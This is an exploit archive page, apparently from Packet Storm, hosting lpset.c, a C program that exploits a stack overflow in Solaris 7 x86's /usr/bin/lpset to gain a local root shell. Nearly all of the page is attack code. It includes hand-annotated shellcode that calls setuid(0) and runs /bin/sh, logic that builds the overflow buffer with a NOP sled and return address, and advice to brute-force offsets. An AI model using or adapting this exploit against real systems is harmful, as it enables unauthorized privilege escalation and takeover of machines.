what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

lpset.c

lpset.c
Posted Apr 25, 2000
Authored by Anathema | Site hack.co.za

/usr/bin/lpset local root stack overflow for Solaris 7, x86.

tags | exploit, overflow, x86, local, root
systems | solaris
SHA-256 | a475a736a78b2988273182e46297cb031078a395224c65cf9e12a7ddf3c792fb

lpset.c

Change Mirror Download
/* private */
/*
* lpset local root stack overflow, solaris 7 x86
* by anathema <anathema@hack.co.za>
*
* Slightly different exploitation technique: we place the run of NOPs
* and the shellcode after the return address, there isn't room before.
*
* offset 0 works for solaris 7, brute-force from -500 to +500 otherwise.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define RETPOS 0x28

char c0de[] =
/* main: */
"\xeb\x0a" /* jmp ahead */
/* a_lcall: */
"\x9a\x78\x78\x78\x5c\x07\x78" /* lcall */
"\xc3" /* ret */
/* jmp_0: */
"\xeb\x05" /* jmp start_0 */
/* ahead: */
"\xe8\xf9\xff\xff\xff" /* call jmp_0 */
/* start_0: */ /* setuid(0); - yes, this is necessary */
"\x5e" /* popl %esi */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xe8\xe0\xff\xff\xff" /* call a_lcall */
"\xeb\x1f" /* jmp callz */
/* start: */ /* execve /bin/sh */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi), %ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi) */
"\x89\x46\x14" /* movl %eax, 0x14(%esi) */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
"\x89\x46\x07" /* movl %eax, 0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x51" /* pushl %ecx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */
/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */

int
main(int argc, char **argv)
{
u_char buf[1024] = {0};
u_long addr = &addr;
int ret = RETPOS, i = 0;

if (argc > 1) addr += atoi(argv[1]);
fprintf(stderr, "using addr 0x%lx\n", addr);

/* [padding][addr][nop][shellcode] */
memset(buf, 0x90, ret);

buf[ret+0] = (addr & 0xff);
buf[ret+1] = (addr >> 8) & 0xff;
buf[ret+2] = (addr >> 16) & 0xff;
buf[ret+3] = (addr >> 24) & 0xff;
ret += 4;

memset(buf + ret, 0x90, sizeof(buf) - ret);
memcpy(buf + strlen(buf) - strlen(c0de), c0de, strlen(c0de));

execl("/usr/bin/lpset", "lpset", "-n", "xfn", "-r", buf, "r00t", NULL);
}

/* EOF */
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close